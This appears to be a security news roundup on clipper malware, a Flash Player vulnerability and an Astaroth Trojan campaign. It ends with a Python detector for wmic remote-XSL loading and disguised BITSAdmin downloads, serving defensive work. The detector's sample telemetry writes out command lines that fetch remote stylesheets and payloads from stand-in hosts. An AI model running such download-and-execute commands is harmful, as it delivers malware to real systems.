Clipper Malware

A malicious app designed to steal cryptocurrency from victims by replacing a wallet address in the phone’s clipboard has been identified as the first “clipper” malware found on Google Play, the official Android app store.

Usually cryptocurrency-stealers are found on unsanctioned Android app stores, but researchers with ESET on Friday said that they spotted the malicious app (a fake version of the legitimate MetaMask service) shortly after it had been introduced at the official Android store on Feb. 1. The app has since been removed, but anyone who had already downloaded it remains affected.

Source: ThreatPost

How do you protect yourself?

Proper security measures must be in place to defend against Clipper malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

CVE-2019-7090

Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address one important vulnerability in Adobe Flash Player. Successful exploitation could lead to information disclosure in the context of the current user.

Source: Adobe

How do you protect yourself?

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the latest version:

Product | Version | Platform | Priority | Availability
Adobe Flash Player Desktop Runtime | 32.0.0.142 | Windows, macOS | 2 | Flash Player Download Center, Flash Player Distribution
Adobe Flash Player for Google Chrome | 32.0.0.142 | Windows, macOS, Linux, and Chrome OS | 2 | Google Chrome Releases
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 | 32.0.0.144 | Windows 10 and 8.1 | 2 | Microsoft Security Advisory
Adobe Flash Player Desktop Runtime | 32.0.0.142 | Linux | 3 | Flash Player Download Center

Astaroth Trojan

A new Astaroth Trojan campaign targeting Brazil and European countries is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and load malicious modules.

According to Cybereason’s Nocturnus team which discovered the new Astaroth strain, just like previous installments, the malware uses “legitimate, built-in Windows OS processes to perform malicious activities and deliver a payload without being detected” but it also makes use “of well-known tools and even antivirus software to expand its capabilities.”

This Astaroth variant is distributed through spam campaigns just like previous versions, and the infection starts with a .7zip archive delivered to the target as an e-mail attachment or hyperlink. The malicious archive contains a .lnk file that spawns a wmic.exe process, which in turn will “initialize an XSL Script Processing attack.”

Next, the malware connects to a command-and-control (C2) server and exfiltrates information about the infected computer. After downloading the encrypted XSL script to the infected machine, the Trojan will use BITSAdmin to grab a payload from another C2 server, carefully obfuscated as images or files without extensions containing various Astaroth modules.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against Astaroth Trojan and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.
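The two stages of the chain described above (wmic.exe loading a remote XSL stylesheet, then BITSAdmin fetching a payload disguised as an image or extensionless file) can be picked out of process-creation telemetry. The following is an added example written for this page, not code from Cybereason or BleepingComputer; the pipe-delimited records, the hostnames and the example.invalid URLs are constructed sample data, and the assumption that the BITS job is spawned with wmic.exe as its parent is mine.

```python
import posixpath
import re
# Constructed process-creation records (host|parent|image|command_line); sample data
# for this example, not telemetry from the campaign described above.
SAMPLE_EVENTS = """\
WS01|explorer.exe|wmic.exe|wmic.exe os get /format:"https://cdn.example.invalid/v.xsl"
WS01|wmic.exe|bitsadmin.exe|bitsadmin /transfer j1 /download https://img.example.invalid/p.jpg C:\\Users\\Public\\p.jpg
WS02|services.exe|wmic.exe|wmic.exe computersystem get model /format:list
WS02|explorer.exe|bitsadmin.exe|bitsadmin /transfer upd /download https://update.example.invalid/setup.msi C:\\Temp\\setup.msi
WS03|cmd.exe|bitsadmin.exe|bitsadmin /transfer j2 /download https://files.example.invalid/a C:\\ProgramData\\a
"""
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
FORMAT_ARG = re.compile(r'/format:\s*"?([^"\s]+)', re.IGNORECASE)


def check_wmic(cmd: str) -> list:
    # Built-in /format: keywords (list, csv, xml, ...) never contain "://" or ".xsl";
    # a URL or .xsl path means wmic.exe is loading an attacker-supplied stylesheet.
    m = FORMAT_ARG.search(cmd)
    if m and ("://" in m.group(1) or m.group(1).lower().endswith(".xsl")):
        return ["wmic_remote_xsl"]
    return []


def check_bitsadmin(parent: str, cmd: str) -> list:
    # Flag transfers whose destination is an image or has no extension (the disguise
    # noted above) and transfers spawned by the wmic.exe XSL stage (assumed parent).
    if "/transfer" not in cmd.lower():
        return []
    ext = posixpath.splitext(cmd.split()[-1].replace("\\", "/"))[1].lower()
    hits = ["bits_disguised_download"] if ext == "" or ext in IMAGE_EXTS else []
    if parent.lower() == "wmic.exe":
        hits.append("bits_spawned_by_wmic")
    return hits


def analyze(events: str) -> dict:
    # Collect findings per host so the two stages can be correlated.
    findings = {}
    for line in events.splitlines():
        host, parent, image, cmd = line.split("|", 3)
        hits = check_wmic(cmd) if image.lower() == "wmic.exe" else []
        if image.lower() == "bitsadmin.exe":
            hits = check_bitsadmin(parent, cmd)
        if hits:
            findings.setdefault(host, []).extend(hits)
    return findings


def chained_hosts(findings: dict) -> list:
    # Hosts showing both stages: remote XSL via wmic.exe and a disguised BITS download.
    return sorted(h for h, f in findings.items()
                  if "wmic_remote_xsl" in f and "bits_disguised_download" in f)
```

Run against real telemetry, a single finding on a host is a lead to triage; a host that appears in `chained_hosts` matches the full sequence and deserves immediate isolation and review.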